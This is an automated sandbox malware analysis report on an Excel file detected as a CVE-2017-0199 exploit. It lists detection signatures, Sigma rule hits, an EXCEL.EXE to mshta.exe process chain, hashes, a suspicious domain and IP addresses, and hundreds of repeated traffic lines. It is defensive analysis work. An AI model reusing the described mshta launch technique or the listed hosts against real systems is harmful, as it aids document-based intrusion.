Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

Overview

General Information

Sample name:SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx
Analysis ID:1636191
MD5:f70e63b415e06294c4a4d0297166ae32
SHA1:34b45ced7f155ec3c5f835a1cba69f0fc83660eb
SHA256:7479a3b015ea50100be27c4bda29ec946f21448cbdbf0f1f1eab4aa30168ada5
Tags:xlsxuser-SecuriteInfoCom
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 2432 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 7960 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 8032 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 2572 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 2432, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 7960, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 3.39.89.152, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2432, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 63570
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 63570, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2432, Protocol: tcp, SourceIp: 3.39.89.152, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxReversingLabs: Detection: 23%
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxVirustotal: Detection: 28%Perma Link
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 2.22.242.113:443 -> 192.168.2.24:63582 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: 241.42.69.40.in-addr.arpa
Source: global trafficDNS query: name: 197.87.175.4.in-addr.arpa
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
